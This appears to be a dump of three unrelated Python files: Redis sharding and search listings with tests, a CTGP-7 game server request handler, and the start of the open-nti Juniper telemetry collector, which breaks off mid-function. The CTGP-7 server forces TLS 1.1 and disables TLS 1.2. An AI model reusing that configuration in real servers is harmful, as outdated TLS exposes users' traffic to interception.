id = parse_and_search(conn, query, ttl=ttl) #D
pipeline = conn.pipeline(True)
pipeline.scard('idx:' + id) #E
pipeline.sort('idx:' + id, by=by, alpha=alpha, #F
desc=desc, start=start, num=num) #F
results = pipeline.execute()
return results[0], results[1], id #G
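# Illustrative usage sketch (not part of the original listings): paginating
# a cached search; key names follow the 'idx:' conventions above and the
# query terms are made up.
#
#   count, docids, cache_id = search_and_sort(conn, ['redis', 'search'])
#   # a later page can reuse the cached intersection while its TTL lasts:
#   count, docids, cache_id = search_and_sort(
#       conn, ['redis', 'search'], id=cache_id, start=20)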
def zintersect(conn, keys, ttl):
id = str(uuid.uuid4())
conn.zinterstore('idx:' + id,
dict(('idx:'+k, v) for k,v in keys.items()))
conn.expire('idx:' + id, ttl)
return id
def search_and_zsort(conn, query, id=None, ttl=300, update=1, vote=0, #A
start=0, num=20, desc=True): #A
if id and not conn.expire(id, ttl): #B
id = None #B
if not id: #C
id = parse_and_search(conn, query, ttl=ttl) #C
scored_search = { #D
id: 0, #D
'sort:update': update, #D
'sort:votes': vote #D
}
id = zintersect(conn, scored_search, ttl) #E
pipeline = conn.pipeline(True)
pipeline.zcard('idx:' + id) #F
if desc: #G
pipeline.zrevrange('idx:' + id, start, start + num - 1) #G
else: #G
pipeline.zrange('idx:' + id, start, start + num - 1) #G
results = pipeline.execute()
return results[0], results[1], id #H
def execute_later(conn, queue, name, args):
t = threading.Thread(target=globals()[name], args=tuple(args))
    t.daemon = True
t.start()
HOME_TIMELINE_SIZE = 1000
POSTS_PER_PASS = 1000
def shard_key(base, key, total_elements, shard_size): #A
if isinstance(key, int) or key.isdigit(): #B
shard_id = int(str(key), 10) // shard_size #C
else:
if isinstance(key, str):
key = key.encode('latin-1')
shards = 2 * total_elements // shard_size #D
shard_id = binascii.crc32(key) % shards #E
return "%s:%s"%(base, shard_id) #F
def shard_sadd(conn, base, member, total_elements, shard_size):
shard = shard_key(base,
'x'+str(member), total_elements, shard_size) #A
return conn.sadd(shard, member) #B
SHARD_SIZE = 512
EXPECTED = defaultdict(lambda: 1000000)
# <start id="get-connection"/>
def get_redis_connection(component, wait=1):
key = 'config:redis:' + component
old_config = CONFIGS.get(key, object()) #A
config = get_config( #B
config_connection, 'redis', component, wait) #B
if config != old_config: #C
REDIS_CONNECTIONS[key] = redis.Redis(**config) #C
return REDIS_CONNECTIONS.get(key) #D
# <end id="get-connection"/>
#A Fetch the old configuration, if any
#B Get the new configuration, if any
#C If the new and old configuration do not match, create a new connection
#D Return the desired connection object
#END
# <start id="get-sharded-connection"/>
def get_sharded_connection(component, key, shard_count, wait=1):
shard = shard_key(component, 'x'+str(key), shard_count, 2) #A
return get_redis_connection(shard, wait) #B
# <end id="get-sharded-connection"/>
#A Calculate the shard id of the form: <component>:<shard>
#B Return the connection
#END
# <start id="no-decorator-example"/>
def log_recent(conn, app, message):
'the old log_recent() code'
log_recent = redis_connection('logs')(log_recent) #A
# <end id="no-decorator-example"/>
#A This performs the equivalent decoration, but requires repeating the 'log_recent' function name 3 times
#END
# <start id="shard-aware-decorator"/>
def sharded_connection(component, shard_count, wait=1): #A
def wrapper(function): #B
@functools.wraps(function) #C
def call(key, *args, **kwargs): #D
conn = get_sharded_connection( #E
component, key, shard_count, wait) #E
return function(conn, key, *args, **kwargs) #F
return call #G
return wrapper #H
# <end id="shard-aware-decorator"/>
#A Our decorator is going to take a component name, as well as the number of shards desired
#B We are then going to create a wrapper that will actually decorate the function
#C Copy some useful metadata from the original function to the configuration handler
#D Create the function that will calculate a shard id for keys, and set up the connection manager
#E Fetch the sharded connection
#F Actually call the function, passing the connection and existing arguments
#G Return the fully wrapped function
#H Return a function that can wrap functions that need a sharded connection
#END
# <start id="sharded-count-unique"/>
@sharded_connection('unique', 16) #A
def count_visit(conn, session_id):
today = date.today()
key = 'unique:%s'%today.isoformat()
conn2, expected = get_expected(key, today) #B
id = int(session_id.replace('-', '')[:15], 16)
if shard_sadd(conn, key, id, expected, SHARD_SIZE):
conn2.incr(key) #C
@redis_connection('unique') #D
def get_expected(conn, key, today):
'all of the same function body as before, except the last line'
return conn, EXPECTED[key] #E
# <end id="sharded-count-unique"/>
#A We are going to shard this to 16 different machines, which will automatically shard to multiple keys on each machine
#B Our changed call to get_expected()
#C Use the returned non-sharded connection to increment our unique counts
#D Use a non-sharded connection to get_expected()
#E Also return the non-sharded connection so that count_visit() can increment our unique count as necessary
#END
# <start id="search-with-values"/>
def search_get_values(conn, query, id=None, ttl=300, sort="-updated", #A
start=0, num=20): #A
count, docids, id = search_and_sort( #B
conn, query, id, ttl, sort, 0, start+num) #B
key = "kb:doc:%s"
sort = sort.lstrip('-')
pipe = conn.pipeline(False)
for docid in docids: #C
if isinstance(docid, bytes):
docid = docid.decode('latin-1')
pipe.hget(key%docid, sort) #C
sort_column = pipe.execute() #C
data_pairs = list(zip(docids, sort_column)) #D
return count, data_pairs, id #E
# <end id="search-with-values"/>
#A We need to take all of the same parameters to pass on to search_and_sort()
#B First get the results of a search and sort
#C Fetch the data that the results were sorted by
#D Pair up the document ids with the data that it was sorted by
#E Return the count, data, and cache id of the results
#END
# <start id="search-on-shards"/>
def get_shard_results(component, shards, query, ids=None, ttl=300, #A
sort="-updated", start=0, num=20, wait=1): #A
count = 0 #B
data = [] #B
ids = ids or shards * [None] #C
for shard in range(shards):
conn = get_redis_connection('%s:%s'%(component, shard), wait)#D
c, d, i = search_get_values( #E
conn, query, ids[shard], ttl, sort, start, num) #E
count += c #F
data.extend(d) #F
ids[shard] = i #F
return count, data, ids #G
# <end id="search-on-shards"/>
#A In order to know what servers to connect to, we are going to assume that all of our shard information is kept in the standard configuration location
#B Prepare structures to hold all of our fetched data
#C Use cached results if we have any, otherwise start over
#D Get or create a connection to the desired shard
#E Fetch the search results and their sort values
#F Combine this shard's results with all of the other results
#G Return the raw results from all of the shards
#END
def get_values_thread(component, shard, wait, rqueue, *args, **kwargs):
conn = get_redis_connection('%s:%s'%(component, shard), wait)
count, results, id = search_get_values(conn, *args, **kwargs)
rqueue.put((shard, count, results, id))
def get_shard_results_thread(component, shards, query, ids=None, ttl=300,
sort="-updated", start=0, num=20, wait=1, timeout=.5):
ids = ids or shards * [None]
rqueue = Queue()
for shard in range(shards):
t = threading.Thread(target=get_values_thread, args=(
component, shard, wait, rqueue, query, ids[shard],
ttl, sort, start, num))
        t.daemon = True
t.start()
received = 0
count = 0
data = []
deadline = time.time() + timeout
while received < shards and time.time() < deadline:
try:
sh, c, r, i = rqueue.get(timeout=max(deadline-time.time(), .001))
except Empty:
break
else:
count += c
data.extend(r)
ids[sh] = i
return count, data, ids
# <start id="merge-sharded-results"/>
def to_numeric_key(data):
try:
return Decimal(data[1] or '0') #A
    except Exception:
return Decimal('0') #A
def to_string_key(data):
return data[1] or '' #B
def search_shards(component, shards, query, ids=None, ttl=300, #C
sort="-updated", start=0, num=20, wait=1): #C
count, data, ids = get_shard_results( #D
component, shards, query, ids, ttl, sort, start, num, wait) #D
reversed = sort.startswith('-') #E
sort = sort.strip('-') #E
key = to_numeric_key #E
if sort not in ('updated', 'id', 'created'): #E
key = to_string_key #E
data.sort(key=key, reverse=reversed) #F
results = []
for docid, score in data[start:start+num]: #G
results.append(docid) #G
return count, results, ids #H
# <end id="merge-sharded-results"/>
#A We are going to use the 'Decimal' numeric type here because it transparently handles both integers and floats reasonably, defaulting to 0 if the value wasn't numeric or was missing
#B Always return a string, even if there was no value stored
#C We need to take all of the sharding and searching arguments, mostly to pass on to lower-level functions, but we use the sort and search offsets
#D Fetch the results of the unsorted sharded search
#E Prepare all of our sorting options
#F Actually sort our results based on the sort parameter
#G Fetch just the page of results that we want
#H Return the results, including the sequence of cache ids for each shard
#END
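# Illustrative sketch (not part of the original listings): the merge step in
# search_shards() sorts (docid, sort_column) pairs gathered from every shard
# with the key helpers above, then slices out one page.
def _demo_merge_page():
    data = [('doc1', '5'), ('doc2', None), ('doc3', '12')]
    data.sort(key=to_numeric_key, reverse=True)
    assert [docid for docid, _ in data] == ['doc3', 'doc1', 'doc2']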
# <start id="zset-search-with-values"/>
def search_get_zset_values(conn, query, id=None, ttl=300, update=1, #A
vote=0, start=0, num=20, desc=True): #A
count, r, id = search_and_zsort( #B
conn, query, id, ttl, update, vote, 0, 1, desc) #B
if desc: #C
data = conn.zrevrange(id, 0, start + num - 1, withscores=True)#C
else: #C
data = conn.zrange(id, 0, start + num - 1, withscores=True) #C
return count, data, id #D
# <end id="zset-search-with-values"/>
#A We need to accept all of the standard arguments for search_and_zsort()
#B Call the underlying search_and_zsort() function to get the cached result id and total number of results
#C Fetch all of the results we need, including their scores
#D Return the count, results with scores, and the cache id
#END
# <start id="search-shards-zset"/>
def search_shards_zset(component, shards, query, ids=None, ttl=300, #A
update=1, vote=0, start=0, num=20, desc=True, wait=1):#A
count = 0 #B
data = [] #B
ids = ids or shards * [None] #C
for shard in range(shards):
conn = get_redis_connection('%s:%s'%(component, shard), wait) #D
c, d, i = search_get_zset_values(conn, query, ids[shard], #E
ttl, update, vote, start, num, desc) #E
count += c #F
data.extend(d) #F
ids[shard] = i #F
def key(result): #G
return result[1] #G
    data.sort(key=key, reverse=desc)                        #H
results = []
for docid, score in data[start:start+num]: #I
results.append(docid) #I
return count, results, ids #J
# <end id="search-shards-zset"/>
#A We need to take all of the sharding arguments along with all of the search arguments
#B Prepare structures for data to be returned
#C Use cached results if any, otherwise start from scratch
#D Fetch or create a connection to each shard
#E Perform the search on a shard and fetch the scores
#F Merge the results together
#G Prepare the simple sort helper to only return information about the score
#H Sort all of the results together
#I Extract the document ids from the results, removing the scores
#J Return the search results to the caller
#END
# <start id="sharded-api-base"/>
class KeyShardedConnection(object):
def __init__(self, component, shards): #A
self.component = component #A
self.shards = shards #A
def __getitem__(self, key): #B
return get_sharded_connection( #C
self.component, key, self.shards) #C
# <end id="sharded-api-base"/>
#A The object is initialized with the component name and number of shards
#B When an item is fetched from the object, this method is called with the item that was requested
#C Use the passed key along with the previously-known component and shards to fetch the sharded connection
#END
# <start id="sharded-api-example"/>
sharded_timelines = KeyShardedConnection('timelines', 8) #A
def follow_user(conn, uid, other_uid):
fkey1 = 'following:%s'%uid
fkey2 = 'followers:%s'%other_uid
if conn.zscore(fkey1, other_uid):
print("already followed", uid, other_uid)
return None
now = time.time()
pipeline = conn.pipeline(True)
pipeline.zadd(fkey1, {other_uid: now})
pipeline.zadd(fkey2, {uid: now})
pipeline.zcard(fkey1)
pipeline.zcard(fkey2)
following, followers = pipeline.execute()[-2:]
pipeline.hset('user:%s'%uid, 'following', following)
pipeline.hset('user:%s'%other_uid, 'followers', followers)
pipeline.execute()
pkey = 'profile:%s'%other_uid
status_and_score = sharded_timelines[pkey].zrevrange( #B
pkey, 0, HOME_TIMELINE_SIZE-1, withscores=True) #B
if status_and_score:
hkey = 'home:%s'%uid
pipe = sharded_timelines[hkey].pipeline(True) #C
pipe.zadd(hkey, dict(status_and_score)) #D
pipe.zremrangebyrank(hkey, 0, -HOME_TIMELINE_SIZE-1)#D
pipe.execute() #E
return True
# <end id="sharded-api-example"/>
#A Create a connection that knows about the sharding information for a given component with a number of shards
#B Fetch the recent status messages from the profile timeline of the now-followed user
#C Get a connection based on the shard key provided, and fetch a pipeline from that
#D Add the statuses to the home timeline ZSET on the shard, then trim it
#E Execute the transaction
#END
# <start id="key-data-sharded-api"/>
class KeyDataShardedConnection(object):
def __init__(self, component, shards): #A
self.component = component #A
self.shards = shards #A
def __getitem__(self, ids): #B
id1, id2 = list(map(int, ids)) #C
if id2 < id1: #D
id1, id2 = id2, id1 #D
key = "%s:%s"%(id1, id2) #E
return get_sharded_connection( #F
self.component, key, self.shards) #F
# <end id="key-data-sharded-api"/>
#A The object is initialized with the component name and number of shards
#B When the pair of ids are passed as part of the dictionary lookup, this method is called
#C Unpack the pair of ids, and ensure that they are integers
#D If the second is less than the first, swap them so that the first id is less than or equal to the second
#E Construct a key based on the two ids
#F Use the computed key along with the previously-known component and shards to fetch the sharded connection
#END
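# A minimal sketch (hypothetical helper, not part of the original listing)
# showing why KeyDataShardedConnection routes both argument orders of a pair
# to the same shard: the ids are normalized into a single canonical key.
def _pair_key(id1, id2):
    # Mirrors the key construction in KeyDataShardedConnection.__getitem__
    id1, id2 = sorted((int(id1), int(id2)))
    return "%s:%s" % (id1, id2)

assert _pair_key(27, 3) == _pair_key(3, 27) == "3:27"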
_follow_user = follow_user
# <start id="sharded-api-example2"/>
sharded_timelines = KeyShardedConnection('timelines', 8) #A
sharded_followers = KeyDataShardedConnection('followers', 16) #A
def follow_user(conn, uid, other_uid):
fkey1 = 'following:%s'%uid
fkey2 = 'followers:%s'%other_uid
sconn = sharded_followers[uid, other_uid] #B
if sconn.zscore(fkey1, other_uid): #C
return None
now = time.time()
spipe = sconn.pipeline(True)
spipe.zadd(fkey1, {other_uid: now}) #D
spipe.zadd(fkey2, {uid: now}) #D
following, followers = spipe.execute()
pipeline = conn.pipeline(True)
pipeline.hincrby('user:%s'%uid, 'following', int(following)) #E
pipeline.hincrby('user:%s'%other_uid, 'followers', int(followers))#E
pipeline.execute()
pkey = 'profile:%s'%other_uid
status_and_score = sharded_timelines[pkey].zrevrange(
pkey, 0, HOME_TIMELINE_SIZE-1, withscores=True)
if status_and_score:
hkey = 'home:%s'%uid
pipe = sharded_timelines[hkey].pipeline(True)
pipe.zadd(hkey, dict(status_and_score))
pipe.zremrangebyrank(hkey, 0, -HOME_TIMELINE_SIZE-1)
pipe.execute()
return True
# <end id="sharded-api-example2"/>
#A Create a connection that knows about the sharding information for a given component with a number of shards
#B Fetch the connection object for the uid,other_uid pair
#C Check to see if other_uid is already followed
#D Add the follower/following information to the ZSETs
#E Update the follower and following information for both users
#END
# <start id="sharded-zrangebyscore"/>
def sharded_zrangebyscore(component, shards, key, min, max, num): #A
data = []
for shard in range(shards):
conn = get_redis_connection("%s:%s"%(component, shard)) #B
data.extend(conn.zrangebyscore( #C
key, min, max, start=0, num=num, withscores=True)) #C
def key(pair): #D
return pair[1], pair[0] #D
data.sort(key=key) #D
return data[:num] #E
# <end id="sharded-zrangebyscore"/>
#A We need to take arguments for the component and number of shards, and we are going to limit the arguments to be passed on to only those that will ensure correct behavior in sharded situations
#B Fetch the sharded connection for the current shard
#C Get the data from Redis for this shard
#D Sort the data based on score then by member
#E Return only the number of items requested
#END
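# A self-contained sketch (pure Python, no Redis) of why sharded_zrangebyscore()
# is correct: each shard contributes up to `num` of its lowest-scored matching
# pairs, so a global sort-then-trim reproduces the first `num` pairs that a
# single unsharded ZSET would have returned.
def merge_shard_pages(pages, num):
    merged = []
    for page in pages:             # one (member, score) list per shard
        merged.extend(page[:num])  # each shard already returned <= num items
    merged.sort(key=lambda pair: (pair[1], pair[0]))  # by score, then member
    return merged[:num]

# merge_shard_pages([[('a', 1), ('c', 3)], [('b', 2)]], 2) -> [('a', 1), ('b', 2)]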
# <start id="sharded-syndicate-posts"/>
def syndicate_status(uid, post, start=0, on_lists=False):
root = 'followers'
key = 'followers:%s'%uid
base = 'home:%s'
if on_lists:
root = 'list:out'
key = 'list:out:%s'%uid
base = 'list:statuses:%s'
followers = sharded_zrangebyscore(root, #A
sharded_followers.shards, key, start, 'inf', POSTS_PER_PASS)#A
to_send = defaultdict(list) #B
for follower, start in followers:
timeline = base % follower #C
shard = shard_key('timelines', #D
timeline, sharded_timelines.shards, 2) #D
to_send[shard].append(timeline) #E
for timelines in to_send.values():
pipe = sharded_timelines[timelines[0]].pipeline(False) #F
for timeline in timelines:
pipe.zadd(timeline, post) #G
pipe.zremrangebyrank( #G
timeline, 0, -HOME_TIMELINE_SIZE-1) #G
pipe.execute()
conn = redis.Redis()
if len(followers) >= POSTS_PER_PASS:
execute_later(conn, 'default', 'syndicate_status',
[uid, post, start, on_lists])
elif not on_lists:
execute_later(conn, 'default', 'syndicate_status',
[uid, post, 0, True])
# <end id="sharded-syndicate-posts"/>
#A Fetch the next group of followers using the sharded ZRANGEBYSCORE call
#B Prepare a structure that will group profile information on a per-shard basis
#C Calculate the key for the timeline
#D Find the shard where this timeline would go
#E Add the timeline key to the rest of the timelines on the same shard
#F Get a connection to the server for the group of timelines, and create a pipeline
#G Add the post to the timeline, and remove any posts that are too old
#END
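# Note on the pass chaining above: the loop variable `start` from
# 'for follower, start in followers' ends the loop holding the score of the
# last follower processed, and that score is what gets passed to the next
# delayed syndicate_status() call, so successive passes walk the follower
# ZSET in score order instead of restarting from the beginning.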
def _fake_shards_for(conn, component, count, actual):
assert actual <= 4
for i in range(count):
m = i % actual
conn.set('config:redis:%s:%i'%(component, i), json.dumps({'db':14 - m}))
class TestCh10(unittest.TestCase):
def _flush(self):
self.conn.flushdb()
redis.Redis(db=14).flushdb()
redis.Redis(db=13).flushdb()
redis.Redis(db=12).flushdb()
redis.Redis(db=11).flushdb()
def setUp(self):
self.conn = redis.Redis(db=15)
self._flush()
global config_connection
config_connection = self.conn
self.conn.set('config:redis:test', json.dumps({'db':15}))
def tearDown(self):
self._flush()
def test_get_sharded_connections(self):
_fake_shards_for(self.conn, 'shard', 2, 2)
for i in range(10):
get_sharded_connection('shard', i, 2).sadd('foo', i)
s0 = redis.Redis(db=14).scard('foo')
s1 = redis.Redis(db=13).scard('foo')
self.assertTrue(s0 < 10)
self.assertTrue(s1 < 10)
self.assertEqual(s0 + s1, 10)
def test_count_visit(self):
shards = {'db':13}, {'db':14}
self.conn.set('config:redis:unique', json.dumps({'db':15}))
for i in range(16):
self.conn.set('config:redis:unique:%s'%i, json.dumps(shards[i&1]))
for i in range(100):
count_visit(str(uuid.uuid4()))
base = 'unique:%s'%date.today().isoformat()
total = 0
for c in shards:
conn = redis.Redis(**c)
keys = conn.keys(base + ':*')
for k in keys:
cnt = conn.scard(k)
total += cnt
self.assertEqual(total, 100)
self.assertEqual(self.conn.get(base), b'100')
def test_sharded_search(self):
_fake_shards_for(self.conn, 'search', 2, 2)
docs = 'hello world how are you doing'.split(), 'this world is doing fine'.split()
for i in range(50):
c = get_sharded_connection('search', i, 2)
index_document(c, i, docs[i&1], {'updated':time.time() + i, 'id':i, 'created':time.time() + i})
r = search_and_sort(c, docs[i&1], sort='-id')
self.assertEqual(r[1][0], str(i).encode())
total = 0
for shard in (0,1):
count = search_get_values(get_redis_connection('search:%s'%shard),['this', 'world'], num=50)[0]
total += count
self.assertTrue(count < 50)
self.assertTrue(count > 0)
self.assertEqual(total, 25)
count, r, id = get_shard_results('search', 2, ['world', 'doing'], num=50)
self.assertEqual(count, 50)
self.assertEqual(count, len(r))
self.assertEqual(get_shard_results('search', 2, ['this', 'doing'], num=50)[0], 25)
count, r, id = get_shard_results_thread('search', 2, ['this', 'doing'], num=50)
self.assertEqual(count, 25)
self.assertEqual(count, len(r))
r.sort(key=lambda x:x[1], reverse=True)
r = list(zip(*r))[0]
count, r2, id = search_shards('search', 2, ['this', 'doing'])
self.assertEqual(count, 25)
self.assertEqual(len(r2), 20)
sr2 = set(r2)
sr = set(r)
self.assertEqual(len(sr2 & sr), len(sr2))
def test_sharded_follow_user(self):
_fake_shards_for(self.conn, 'timelines', 8, 4)
sharded_timelines['profile:1'].zadd('profile:1', {1: time.time()})
for u2 in range(2, 11):
sharded_timelines['profile:%i'%u2].zadd('profile:%i'%u2, {u2: time.time() + u2})
_follow_user(self.conn, 1, u2)
_follow_user(self.conn, u2, 1)
self.assertEqual(self.conn.zcard('followers:1'), 9)
self.assertEqual(self.conn.zcard('following:1'), 9)
self.assertEqual(sharded_timelines['home:1'].zcard('home:1'), 9)
for db in range(14, 10, -1):
self.assertTrue(len(list(redis.Redis(db=db).keys())) > 0)
for u2 in range(2, 11):
self.assertEqual(self.conn.zcard('followers:%i'%u2), 1)
self.assertEqual(self.conn.zcard('following:%i'%u2), 1)
self.assertEqual(sharded_timelines['home:%i'%u2].zcard('home:%i'%u2), 1)
def test_sharded_follow_user_and_syndicate_status(self):
_fake_shards_for(self.conn, 'timelines', 8, 4)
_fake_shards_for(self.conn, 'followers', 4, 4)
sharded_followers.shards = 4
sharded_timelines['profile:1'].zadd('profile:1', {1: time.time()})
for u2 in range(2, 11):
sharded_timelines['profile:%i'%u2].zadd('profile:%i'%u2, {u2: time.time() + u2})
follow_user(self.conn, 1, u2)
follow_user(self.conn, u2, 1)
allkeys = defaultdict(int)
for db in range(14, 10, -1):
c = redis.Redis(db=db)
for k in list(c.keys()):
allkeys[k] += c.zcard(k)
for k, v in allkeys.items():
part, _, owner = k.partition(b':')
if part in (b'following', b'followers', b'home'):
self.assertEqual(v, 9 if owner == b'1' else 1)
elif part == b'profile':
self.assertEqual(v, 1)
self.assertEqual(len(sharded_zrangebyscore('followers', 4, 'followers:1', '0', 'inf', 100)), 9)
syndicate_status(1, {'11':time.time()})
self.assertEqual(len(sharded_zrangebyscore('timelines', 8, 'home:2', '0', 'inf', 100)), 2)
if __name__ == '__main__':
unittest.main()
|
CTGP7ServerHandler.py
|
from http.server import HTTPServer
from http.server import BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import threading
import ssl
from urllib import parse
import bson
import sqlite3
import datetime
import os
import traceback
import subprocess
from .CTGP7Requests import CTGP7Requests
from .CTGP7ServerDatabase import CTGP7ServerDatabase
from .CTGP7CtwwHandler import CTGP7CtwwHandler
class CTGP7ServerHandler:
logging_lock = threading.Lock()
debug_mode = False
myself = None
loggerCallback = lambda x : x
@staticmethod
def logMessageToFile(message):
if (CTGP7ServerHandler.debug_mode):
print(message)
else:
if (CTGP7ServerHandler.loggerCallback is not None):
CTGP7ServerHandler.loggerCallback(message)
class PostHandler(BaseHTTPRequestHandler):
def do_POST(self):
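            # Request flow: the POST body is an encrypted BSON document. It is
            # decrypted by the external ./encbsondocument helper, must carry a
            # console id (_CID) and a request _seed, is dispatched through
            # CTGP7Requests.solve(), and the response (with _CID and _seed
            # echoed back plus a 'res' status code) is re-encrypted before
            # being written out.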
timeNow = datetime.datetime.now()
connDataLen = int(self.headers['Content-Length'])
connData = self.rfile.read(connDataLen)
outputData = {}
logStr = "--------------------\n"
logStr += "Timestamp: {}\n".format(timeNow.isoformat())
try:
process = subprocess.Popen(["./encbsondocument", "d"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
process.stdin.write(connData)
process.stdin.flush()
connData = process.stdout.read()
process.wait()
if (process.returncode != 0):
raise Exception("Couldn't decrypt message: {}".format(process.returncode))
inputData = bson.loads(connData)
                if "_CID" not in inputData or "_seed" not in inputData:
                    raise Exception("Input is missing: cID: {}, seed: {}".format("_CID" not in inputData, "_seed" not in inputData))
reqConsoleID = inputData["_CID"]
logStr += "Console ID: 0x{:016X}\n".format(reqConsoleID)
solver = CTGP7Requests(CTGP7ServerHandler.myself.database, CTGP7ServerHandler.myself.ctwwHandler, inputData, CTGP7ServerHandler.debug_mode, reqConsoleID)
outputData.update(solver.solve())
logStr += solver.info
outputData["_CID"] = reqConsoleID
outputData["_seed"] = inputData["_seed"]
outputData["res"] = 0
except Exception:
outputData["res"] = -1
traceback.print_exc()
process = subprocess.Popen(["./encbsondocument", "e"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
process.stdin.write(bson.dumps(outputData))
process.stdin.flush()
connOutData = process.stdout.read()
process.wait()
if (process.returncode != 0):
                connOutData = b'\x00\x00\x00\x00' # encryption failed; fall back to a 4-byte placeholder payload
connOutLen = len(connOutData)
self.send_response(200)
self.send_header('Content-Type',
'"application/octet-stream"')
self.send_header("Content-Length", connOutLen)
self.end_headers()
self.wfile.write(connOutData)
elap = datetime.datetime.now() - timeNow
logStr += "Elapsed: {:.3f}ms\n".format(elap.seconds * 1000 + elap.microseconds / 1000)
logStr += "--------------------\n"
with CTGP7ServerHandler.logging_lock:
CTGP7ServerHandler.logMessageToFile(logStr)
def log_message(self, format, *args):
if (CTGP7ServerHandler.debug_mode):
BaseHTTPRequestHandler.log_message(self, format, *args)
class ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
pass
def __init__(self, isDebugOn: bool):
CTGP7ServerHandler.debug_mode = isDebugOn
CTGP7ServerHandler.myself = self
self.database = CTGP7ServerDatabase()
self.database.connect()
self.ctwwHandler = CTGP7CtwwHandler(self.database)
server_thread = threading.Thread(target=self.server_start)
server_thread.daemon = True
server_thread.start()
def terminate(self):
self.database.disconnect()
self.database = None
self.ctwwHandler = None
CTGP7ServerHandler.myself = None
print("CTGP-7 server terminated.")
def server_start(self):
self.server = self.ThreadingSimpleServer(("", 64333), self.PostHandler)
context = ssl.SSLContext(protocol=ssl.PROTOCOL_TLSv1_1)
context.options |= ssl.OP_NO_TLSv1_2
context.load_cert_chain('RedYoshiBot/server/data/server.pem')
self.server.socket = context.wrap_socket(self.server.socket, server_side=True)
print("CTGP-7 server started.")
self.server.serve_forever()
|
open-nti.py
|
#!/usr/bin/env python
# coding: utf-8
# Authors: efrain@juniper.net psagrera@juniper.net
# Version 2.0 20160124
# root@ocst-2-geo:/opt/open-nti# make cron-show
# docker exec -it opennti_con /usr/bin/python /opt/open-nti/startcron.py -a show -c "/usr/bin/python /opt/open-nti/open-nti.py -s"
# * * * * * /usr/bin/python /opt/open-nti/open-nti.py -s --tag evo
# Version 2.1
# add RE shell output support:
# top -b -n 1 | shell
from datetime import datetime # In order to retrieve time and timespan
from datetime import timedelta # In order to retrieve time and timespan
from influxdb import InfluxDBClient
#from pyez_mock import mocked_device, rpc_reply_dict
from jnpr.junos import *
from jnpr.junos import Device
from jnpr.junos.exception import *
from jnpr.junos.utils.start_shell import StartShell
from lxml import etree # Used for xml manipulation
from pprint import pformat
from pprint import pprint
import argparse # Used for argument parsing
import json
import logging
import logging.handlers
import os # For exec to work
import pprint
import re # For regular expression usage
import requests
import string
import string # For split multiline script into multiple lines
import StringIO # Used for file read/write
import sys # For exec to work
import threading
import time
import xmltodict
import yaml
import copy
logging.getLogger("paramiko").setLevel(logging.INFO)
logging.getLogger("ncclient").setLevel(logging.WARNING) # In order to remove http request from ssh/paramiko
logging.getLogger("requests").setLevel(logging.INFO)
logging.getLogger("urllib3").setLevel(logging.WARNING) # In order to remove http request from InfluxDBClient
####################################################################################
####################################################################################
# Defining the classes and procedures used later on the script
####################################################################################
####################################################################################
def convert_variable_type(var):
try:
result = int(var)
return result
except Exception as e:
pass
try:
result = float(var)
return result
except Exception as e:
pass
    return var # fall back to treating the value as a string
def check_db_status():
# if the db is not found, then try to create it
try:
dbclient = InfluxDBClient(db_server, db_port, db_admin, db_admin_password)
dblist = dbclient.get_list_database()
db_found = False
for db in dblist:
if db['name'] == db_name:
db_found = True
if not(db_found):
logger.info('Database <%s> not found, trying to create it', db_name)
dbclient.create_database(db_name)
return True
except Exception as e:
logger.error('Error querying open-nti database: %s', e)
return False
#def get_latest_datapoints(**kwargs):
#
# dbclient = InfluxDBClient(db_server, db_port, db_admin, db_admin_password)
# dbclient.switch_database(db_name)
# results = {}
# if db_schema == 1:
# query = "select * from /%s\./ ORDER BY time DESC limit 1 " % (kwargs['host'])
# elif db_schema == 2:
# query = "select * from \"%s\" WHERE device = '%s' GROUP BY * ORDER BY time DESC limit 1 " % ('jnpr.collector',kwargs['host'])
# elif db_schema == 3:
# query = "select * from // WHERE device = '%s' GROUP BY * ORDER BY time DESC limit 1 " % (kwargs['host'])
# else:
# logger.error("ERROR: Unknown db_schema: <%s>", db_schema)
# return results
#
# results = dbclient.query(query)
# return results
def get_target_hosts():
my_target_hosts = {}
for host in sorted(hosts.keys()):
for tag in tag_list:
for hosts_tag in hosts[host].split():
if re.search(tag, hosts_tag, re.IGNORECASE):
my_target_hosts[host] = 1
return my_target_hosts.keys()
def get_target_commands(my_host):
my_host_tags = hosts[my_host]
my_target_commands = {}
for group_command in sorted(general_commands.keys()):
for my_host_tag in my_host_tags.strip().split():
for command_tag in general_commands[group_command]["tags"].split():
if re.search(my_host_tag, command_tag, re.IGNORECASE):
if "commands" in general_commands[group_command].keys():
for cmd in general_commands[group_command]["commands"].strip().split("\n"):
my_target_commands[cmd] = 1
return my_target_commands.keys()
def get_credentials(my_host):
my_host_tags = hosts[my_host]
my_target_credentials = {}
for credential in sorted(credentials.keys()):
for my_host_tag in my_host_tags.strip().split():
for credential_tag in credentials[credential]["tags"].split():
if re.search(my_host_tag, credential_tag, re.IGNORECASE):
if ("username" in credentials[credential].keys()):
if ("method" in credentials[credential].keys()):
if (credentials[credential]["method"] == "key"):
if ("key_file" in credentials[credential].keys()):
return credentials[credential]["username"], "", credentials[credential]["method"], credentials[credential]["key_file"]
else:
logger.error("Missing key_file information")
sys.exit(0)
elif (credentials[credential]["method"] == "enc_key"):
if ("key_file" in credentials[credential].keys()):
if ("password" in credentials[credential].keys()):
return credentials[credential]["username"], credentials[credential]["password"], credentials[credential]["method"], credentials[credential]["key_file"]
else:
logger.error("Missing password information")
sys.exit(0)
else:
logger.error("Missing key_file information")
elif (credentials[credential]["method"] == "password"):
return credentials[credential]["username"], credentials[credential]["password"], credentials[credential]["method"], ""
else:
logger.error("Unknown authentication method found")
sys.exit(0)
else:
if ("password" in credentials[credential].keys()):
return credentials[credential]["username"], credentials[credential]["password"], "password", ""
else:
logger.error("Missing password information")
sys.exit(0)
else:
logger.error("Missing username information")
sys.exit(0)
def execute_command(jdevice,command):
format = "text"
command_tmp = command
    if re.search(r"\| display xml", command, re.IGNORECASE):
        format = "xml"
        command_tmp = command.replace("| display xml","")
    elif re.search(r"\| count", command, re.IGNORECASE):
        format = "txt-filtered"
        command_tmp = command.split("|")[0]
    elif re.search(r"\| shell", command, re.IGNORECASE):
        # This is a shell command meant to run on the RE Linux shell
        ss = StartShell(jdevice)
        ss.open()
        command_tmp = command.split("|")[0]
        command_result = ss.run(command_tmp)
        ss.close()  # close the shell session so it isn't leaked
        return command_result[1]
try:
